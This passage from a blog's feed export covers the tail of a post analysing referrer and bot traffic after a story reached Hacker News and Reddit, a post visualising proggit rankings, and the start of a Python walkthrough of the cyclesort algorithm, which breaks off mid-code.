<tr><th>28<\/th> <td><a href=\"http:\/\/hackurls.com\">hackurls.com<\/a><\/td><\/tr>\n    <tr><th>24<\/th> <td><a href=\"http:\/\/pipes.yahoo.com\">Yahoo Pipes<\/a><\/td><\/tr>\n    <tr><th>18<\/th> <td><a href=\"http:\/\/www.netvibes.com\">www.netvibes.com<\/a><\/td><\/tr>\n    <tr><th>15<\/th> <td><a href=\"http:\/\/dzone.com\">dzone.com<\/a><\/td><\/tr>\n    <tr><th>11<\/th> <td><a href=\"http:\/\/www.freshnews.com\">www.freshnews.org<\/a><\/td><\/tr>\n<\/table>\n<p>It's interesting to see that I got nearly 200 hits from delicous.com. By\ncontrast, <a rel=\"external\" href=\"http:\/\/pinboard.in\">pinboard.in<\/a> - which seems to be delicous.com's\nanointed successor - sent me only two hits. Then again, my post was published\nin late November 2010, about a month before Yahoo <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2010\/12\/16\/is-yahoo-shutting-down-del-icio-us\/\">spectacularly\nhobbled<\/a>\ntheir bookmarking property. I wonder what those figures would look like today.<\/p>\n<p>The thin end of the long tail are the 200 hits from 94 sites that were\nresponsible for 10 or fewer hits each. We can break this motley crew up into a\nfew different classes:<\/p>\n<ul>\n<li>Sites that provide some sort of social news analysis, piggy-backing off HN,\nReddit and delicious.com. For example, <a rel=\"external\" href=\"http:\/\/popacular.com\">popacular.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/seesmic.com\">seesmic.com<\/a>, <a rel=\"external\" href=\"http:\/\/hotgrog.com\">hotgrog.com<\/a>.<\/li>\n<li>URL shorteners like <a rel=\"external\" href=\"http:\/\/j.mp\">j.mp<\/a> and unshorteners like\n<a rel=\"external\" href=\"http:\/\/unitny.me\">untiny.me<\/a><\/li>\n<li>Social media-ish services like <a rel=\"external\" href=\"http:\/\/friendfeed.com\">FriendFeed<\/a>,\n<a rel=\"external\" href=\"http:\/\/stumbleupon.com\">StumbleUpon<\/a>, <a rel=\"external\" href=\"http:\/\/pinboard.in\">pinboard.in<\/a><\/li>\n<li>Tiny personal blogs.<\/li>\n<li>And, surprisingly - a number of sites that just provide an alternative\ninterface or URL for Hacker News: <a rel=\"external\" href=\"http:\/\/hackerne.ws\/\">hackerne.ws<\/a>,\n<a rel=\"external\" href=\"http:\/\/ihackernews.com\/\">ihackernews.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/hacker-newspaper.gilesb.com\/\">hacker-newspaper.gilesb.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.icombinator.net\/\">www.icombinator.net<\/a>.<\/li>\n<\/ul>\n<h2 id=\"robot-scavengers-of-the-social-news-ecosphere\">Robot scavengers of the social news ecosphere<\/h2>\n<p>Let's take a look at overall bot traffic, separating out our silicone friends by\nlooking for non-human and non-standard user-agent headers. The moment the post\nhits the HN front page bot traffic spikes, and this spike continues as the post\nis submitted to Reddit and starts its climb up the proggit front page.<\/p>\n<div class=\"media\">\n    <a href=\"robots.png\">\n        <img src=\"robots.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        robots\n    <\/div>\n    \n<\/div>\n<p>Enter the robot scavengers of the social news ecosphere - a set of second-tier\naggregators that monitor social news and Twitter for hot stories. Here's a\nsample of bot visitors, taken more or less at random from the logs:<\/p>\n<table>\n    <tr><td><a href=\"http:\/\/inagist.com\">inagist.com<\/a><\/td>\n    <td><a href=\"http:\/\/www.netvibes.com\">www.netvibes.com<\/a><\/td>\n    <td><a href=\"http:\/\/chattertrap.com\">chattertrap.com<\/a><\/td>\n    <td><a href=\"http:\/\/twingly.com\">twingly.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/coder.io\">coder.io<\/a><\/td>\n    <td><a href=\"http:\/\/newsmagpie.com\">newsmagpie.com<\/a><\/td>\n    <td><a href=\"http:\/\/worio.com\">worio.com<\/a><\/td>\n    <td><a href=\"http:\/\/www.myvbo.com\">www.myvbo.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/www.zemanta.com\">www.zemanta.com<\/a><\/td>\n    <td><a href=\"http:\/\/embed.ly\">embed.ly<\/a><\/td>\n    <td><a href=\"http:\/\/brandwatch.net\">brandwatch.net<\/a><\/td>\n    <td><a href=\"http:\/\/www.flipboard.com\">www.flipboard.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/paper.li\">paper.li<\/a><\/td>\n    <td><a href=\"http:\/\/rivva.de\">rivva.de<\/a><\/td>\n    <td><a href=\"http:\/\/attribyte.com\">attribyte.com<\/a><\/td>\n    <td><a href=\"http:\/\/diffbot.com\">diffbot.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/yoono.com\">yoono.com<\/a><\/td>\n    <td><a href=\"http:\/\/hatena.net.jp\">hatena.net.jp<\/a><\/td>\n    <td><a href=\"http:\/\/hourlypress.com\">hourlypress.com<\/a><\/td>\n    <td><a href=\"http:\/\/longurl.org\">longurl.org<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/untiny.me\">untiny.me<\/a><\/td>\n    <td><a href=\"http:\/\/goo.ne.jp\">goo.ne.jp<\/a><\/td>\n    <td><a href=\"http:\/\/www.baidu.com\">www.baidu.com<\/a><\/td>\n    <td><a href=\"http:\/\/sharethis.com\">sharethis.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/ideashower.com\">ideashower.com<\/a><\/td>\n    <td><a href=\"http:\/\/pannous.info\">pannous.info<\/a><\/td>\n    <td><a href=\"http:\/\/wikiwix.com\">wikiwix.com<\/a><\/td>\n    <td><a href=\"http:\/\/pipes.yahoo.com\">pipes.yahoo.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/mustexist.com\">mustexist.com<\/a><\/td>\n    <td><a href=\"http:\/\/pics.fefoo.com\">pics.fefoo.com<\/a><\/td>\n    <td><a href=\"http:\/\/cyber.law.harvard.edu\">cyber.law.harvard.edu<\/a><\/td>\n    <td><a href=\"http:\/\/seatgeek.com\">seatgeek.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/metadatalabs.com\">metadatalabs.com<\/a><\/td>\n    <td><a href=\"http:\/\/moreover.com\">moreover.com<\/a><\/td>\n    <td><a href=\"http:\/\/thinglabs.com\">thinglabs.com<\/a><\/td>\n    <td><a href=\"http:\/\/stufftotweet.com\">stufftotweet.com<\/a><\/td><\/tr>\n    <tr>\n        <td><a href=\"http:\/\/chilitweets.com\">chilitweets.com<\/a><\/td>\n        <td><a href=\"http:\/\/bkluster.hut.edu.vn\">bkluster.hut.edu.vn<\/a><\/td>\n        <td><a href=\"http:\/\/wikio.com\">wikio.com<\/a><\/td>\n        <td><a href=\"http:\/\/pipes.yahoo.com\">Yahoo Pipes<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/zite.com\">zite.com<\/a><\/td>\n        <td><a href=\"http:\/\/zelist.ro\">zelist.ro<\/a><\/td>\n        <td><a href=\"http:\/\/buzzzy.com\">buzzzy.com<\/a><\/td>\n        <td><a href=\"http:\/\/intravnews.com\">intravnews.com<\/a><\/td>\n    <\/tr>\n<\/table>\n<p>At this point, I'd like to bitch a bit about how astonishingly badly behaved\nsome of the automated systems skulking around today's web are. The vast, vast\nmajority don't provide any clue about the responsible entity in the user-agent\nstring. The list above consists of responsible bots that do identify\nthemselves, and less responsible ones that I could identify through reverse\ndomain resolution. Most of the irresponsible bots come from Amazon Web\nServices, which seems to be a right wretched hive of scum and villainy. The\nworst performers here boggle the mind - about a dozen hosts from AWS retrieved\nthe blog post more than 200 times a day, all using full GET requests, without\nan If-Modified-Since header, and with no identification. The arch-villain hit\nthe post 600 times in its first 24 hours - that's about once every 2.5 minutes.<\/p>\n<h2 id=\"referrer-less-viewers-and-stealthy-bots\">Referrer-less viewers and stealthy bots<\/h2>\n<p>I was surprised to see that almost 20% of requests not identified as bot\nrequests had no specified referrer, a much greater percentage than I would have\nanticipated. Here's a graph showing the number of referrer-less requests per\nhour:<\/p>\n<div class=\"media\">\n    <a href=\"noreferrer.png\">\n        <img src=\"noreferrer.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        requests without a referrer\n    <\/div>\n    \n<\/div>\n<p>It looks like the double-peak in this graph coincides with the traffic peaks\nfrom HN and Reddit. This suggests that the majority of these hits do in fact\ncome (perhaps indirectly) from HN and Reddit users. One possibility is that a\nchunk of this referrer-less traffic comes from non-browser Twitter clients.<\/p>\n<p>A fraction of the referrer-less traffic also comes from stealthy bots sending\nuser-agent strings that match those of desktop browsers. About 5% of these\nrequests, for example, come from the Amazon EC2 cloud, so are unlikely to be\nreal browsers. One Internet darling that does this is Instapaper, which seems\nto use the requesting client's user-agent string rather than frankly confessing\nitself to be a bot. It also appears to re-request an article in full for each\nuser, rather than simply checking if there's been a change and using a cached\ncopy. On the upside, this means that I know that 131 readers used Instapaper to\nview my post.<\/p>\n<h2 id=\"aftermath\">Aftermath<\/h2>\n<p>After the post drifts off the proggit and HN front pages, traffic dies down.\nThere's a dwindling tail of stragglers that bothered to flip through to the\nsecond or third page of top stories, and a tiny dribble of users who discovered\nthe link through other sources. A month later, the post gets about 60 hits per\nday, of which more than a third are from bots. Non-bot traffic is still\ndominated by Reddit, presumably from people searching or idly flicking through\nReddit's history.<\/p>\n<p>So, in the end, after my once-thrumming server quiets down, what has the\nlasting effect been on my own social graph? I had a small surge of Twitter\nfollows, going from 230 to 245 followers. There was a minor blip of subscribers\nto my RSS feed, with Google Reader reporting subscriptions going from about 510\nto 551. Out of 33,000 unique visitors 56 decided to cultivate a more permanent\nrelationship of some sort to my blog. That's 1 in 600. If you remember only one\nfigure from this post, this should be it.<\/p>\n"},{"title":"A journey through the bowels of proggit","published":"2011-01-12T00:00:00+00:00","updated":"2011-01-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/","content":"<div class=\"media\">\n    <a href=\"proggit4.png\">\n        <img src=\"proggit4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        proggit - 4 hours\n    <\/div>\n    \n<\/div>\n<p>I've had a nagging sense of dissatisfaction with my information diet lately, and\nit's becoming clear that over-reliance on social news sites like Reddit and\nHacker News (much as I love them) lies at the heart of my discontent. For the\npast few months, I've been gathering data to help me come up with a coherent\nexplanation for my malaise. I'm still working on it, so this post will have no\nconclusions, only repulsive metaphors and pretty pictures.<\/p>\n<p>For a week or so in November I logged the slow, peristaltic progress of stories\nthrough the bowels of <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming\">proggit<\/a>, watching\nthem get nudged this way and that by the malodorous, hot gas of public opinion\nbefore finally being shunted on to the colon of the second page of results.  In\nother words, I sampled the top 25 stories every 5 minutes through the RSS feed.\nOne of the things I was interested in was how submission rankings changed over\ntime, so I visualised the dataset using the same technique I came up with to\n<a rel=\"external\" href=\"http:\/\/sortvis.org\">visualise sorting algorithms<\/a>. The image above shows 4\nhours of proggit, with each submission represented by a line. The lines are\ncoloured based on the average rank the story achieves over its lifetime in the\ntop 25, ranging between upvote orange for top stories, and downvote blue for\nbottom stories.<\/p>\n<p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom\nand pan around. The busy cut-and-thrust of life on reddit is all here. The\nmeteoric rise, inevitably followed by long, slow decay. The sudden, mysterious,\nmid-flight disappearances. The jostling and writhing among the bottom\nsubmissions that never quite manage to make it into the big leagues. Heady\nstuff. Click to view:<\/p>\n<div class=\"media\">\n    <a href=\"proggit72.png\">\n        <img src=\"mini72.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        proggit - 72 hours\n    <\/div>\n    \n<\/div>\n<p>Perhaps I'll do an expanded version that lets you view submission titles, times\nand so forth later on.<\/p>\n"},{"title":"Cyclesort - a curious little sorting algorithm","published":"2010-11-22T00:00:00+00:00","updated":"2010-11-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/cyclesort\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/cyclesort\/","content":"<p>One of the nice things about building <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> and\nwriting the posts that led up to it is that people email me with pointers to\nesoteric algorithms I've never heard of. Today's post is dedicated to one of\nthese - a curious little sorting algorithm called\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Cycle_sort\">cyclesort<\/a>. It was described in 1990\nin a <a rel=\"external\" href=\"http:\/\/comjnl.oxfordjournals.org\/content\/33\/4\/365.full.pdf\">3-page paper by B.K.\nHaddon<\/a>, and has\nbecome a firm favourite of mine.<\/p>\n<p>Cyclesort has some nice properties - for certain restricted types of data it\ncan do a stable, in-place sort in linear time, while guaranteeing that each\nelement will be moved at most once. But what I really like about this algorithm\nis how naturally it arises from a simple theorem on <a rel=\"external\" href=\"http:\/\/mathworld.wolfram.com\/SymmetricGroup.html\">symmetric\ngroups<\/a>.  Bear with me while\nI work up to the algorithm through a couple of basic concepts.<\/p>\n<h2 id=\"cycles\">Cycles<\/h2>\n<p>Lets start with the definition of a\n<a rel=\"external\" href=\"http:\/\/mathworld.wolfram.com\/PermutationCycle.html\">cycle<\/a>. A cycle is a subset\nof elements from a permutation that have been rotated from their original\nposition. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]<\/strong>, and a cycle <strong>[0,\n3, 1]<\/strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to\n1 and 1 to 0.  Visually, it looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"graph1.png\">\n        <img src=\"graph1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We can apply a cycle to an ordered set to obtain a permutation, and we can then\nreverse that cycle to re-obtain the original set. Here's a Python function that\napplies a cycle to a list in-place:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> apply_cycle<\/span><span>(lst, c):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Extract the cycle&#39;s values<\/span><\/span>\n<span class=\"giallo-l\"><span>    vals<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [lst[i]<\/span><span style=\"color: #D73A49;\"> for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span> c]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Rotate them circularly by one position<\/span><\/span>\n<span class=\"giallo-l\"><span>    vals<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [vals[<\/span><span style=\"color: #D73A49;\">-<\/span><span style=\"color: #005CC5;\">1<\/span><span>]]<\/span><span style=\"color: #D73A49;\"> +<\/span><span> vals[:<\/span><span style=\"color: #D73A49;\">-<\/span><span style=\"color: #005CC5;\">1<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Re-insert them into the list<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i, offset<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> enumerate<\/span><span>(c):<\/span><\/span>\n<span class=\"giallo-l\"><span>        lst[offset]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> vals[i]<\/span><\/span><\/code><\/pre>\n<p>Here's an interactive session showing the function in action:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> lst<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> c<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> apply_cycle(lst, c)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> lst<\/span><\/span>\n<span class=\"giallo-l\"><span>[<\/span><span style=\"color: #005CC5;\">1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;<\/span><span> c.reverse()<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;<\/span><span> apply_cycle(lst, c)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;<\/span><span> lst<\/span><\/span>\n<span class=\"giallo-l\"><span>[<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span><\/code><\/pre><h2 id=\"permutations\">Permutations<\/h2>\n<p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a\nunique set of disjoint cycles<\/strong>. We can think of this as analogous to the\nfactorization of a number - every permutation is the product a unique set of\ncomponent cycles in the same way every number is the product of a unique set of\nprime factors.  Taking this as a given, how could we calculate the cycles that\nmake up a permutation?  One obvious way to proceed is to pick a starting point,\nand simply \"follow\" the cycle in reverse until we get back to where we started.\nWe know from the result above that the element is guaranteed to be part of a\ncycle, so we must eventually reach our starting point again. When we do, hey\npresto, we have a complete cycle. If we keep track of the elements that are\nalready part of a known cycle, we can skip to the next unknown element and\nrepeat the process.  Once we reach the end of the list we're done.<\/p>\n<p>This scheme can only work if we know where in the ordered sequence any given\nelement belongs, because this is the way we find the \"previous hop\" in a cycle.\nIn the examples above, we worked with lists that consist of a contiguous range\nof numbers <strong>0..n<\/strong>, which gives us a short-cut: the element's value <em>is<\/em> its\noffset in the ordered list. In the code below I've factored this out into a\nfunction <strong>key<\/strong>, which takes an element value, and returns its correct offset - in\nthis case <strong>key<\/strong> is simply the identity function.<\/p>\n<p>Here's a Python function that finds all cycles in permutations of numbers\nranging from <strong>0..n<\/strong>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> find_cycles<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span>    seen<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> set<\/span><span>()<\/span><\/span>\n<span class=\"giallo-l\"><span>    cycles<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i])<\/span><span style=\"color: #D73A49;\"> and not<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span> seen:<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycle<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                cycle.append(n)<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(l[n])<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span>\n<span class=\"giallo-l\"><span>            seen<\/span><span style=\"color: #D73A49;\"> =<\/span><span> seen.union(<\/span><span style=\"color: #005CC5;\">set<\/span><span>(cycle))<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycles.append(<\/span><span style=\"color: #005CC5;\">list<\/span><span>(<\/span><span style=\"color: #005CC5;\">reversed<\/span><span>(cycle)))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> cycles<\/span><\/span><\/code><\/pre>\n<p>Running it on our example permutation produces the cycle we used to produce it:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> find_cycles([<\/span><span style=\"color: #005CC5;\">1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>])<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> [[<\/span><span style=\"color: #005CC5;\">3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>]]<\/span><\/span><\/code><\/pre>\n<p>Here's <strong>find_cycles<\/strong> run on a longer, randomly shuffled list:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>l<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 5<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 6<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 8<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 7<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 9<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> find_cycles(l)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> [[<\/span><span style=\"color: #005CC5;\">7<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 5<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>], [<\/span><span style=\"color: #005CC5;\">9<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 6<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>], [<\/span><span style=\"color: #005CC5;\">8<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>]]<\/span><\/span><\/code><\/pre>\n<p>And here's a handsomely colourful graphical version of the output above:<\/p>\n<div class=\"media\">\n    <a href=\"graph2.png\">\n        <img src=\"graph2.png\"  \/>\n    <\/a>\n\n    \n<\/div><h2 id=\"a-sorting-algorithm-emerges\">A sorting algorithm emerges<\/h2>\n<p>Let's take a closer look at the <strong>find_cycles<\/strong> function above. We keep track of\nelements that are already part of a cycle in the <strong>seen<\/strong> set, so that we can\nskip them as we proceed through the list. The <strong>seen<\/strong> set can be as large as\nthe list itself, so we've doubled the memory requirement for the algorithm. If\nwe're allowed to destroy the input list, we can avoid explicitly tracking seen\nelements by relocating elements to their correct position as we work our way\naround each cycle. All the cycles are disjoint and we traverse each cycle only\nonce, so doing this won't affect the function's output. We can then tell that\nwe need to skip an element we've already seen by checking whether it's in the\ncorrect sorted position. Here's the result:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> find_cycles2<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span>    cycles<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycle<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                cycle.append(n)<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycles.append(<\/span><span style=\"color: #005CC5;\">list<\/span><span>(<\/span><span style=\"color: #005CC5;\">reversed<\/span><span>(cycle)))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> cycles<\/span><\/span><\/code><\/pre>\n<p>But... at the end of this process, the original list is sorted! Tada: cyclesort\npops out of the shrubbery almost as a side-effect of efficiently finding all\ncycles. If we're only interested in sorting, we can strip the code that saves\nthe cycles, which leaves us with a nice, pared-back sorting algorithm:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> cyclesort_simple<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> 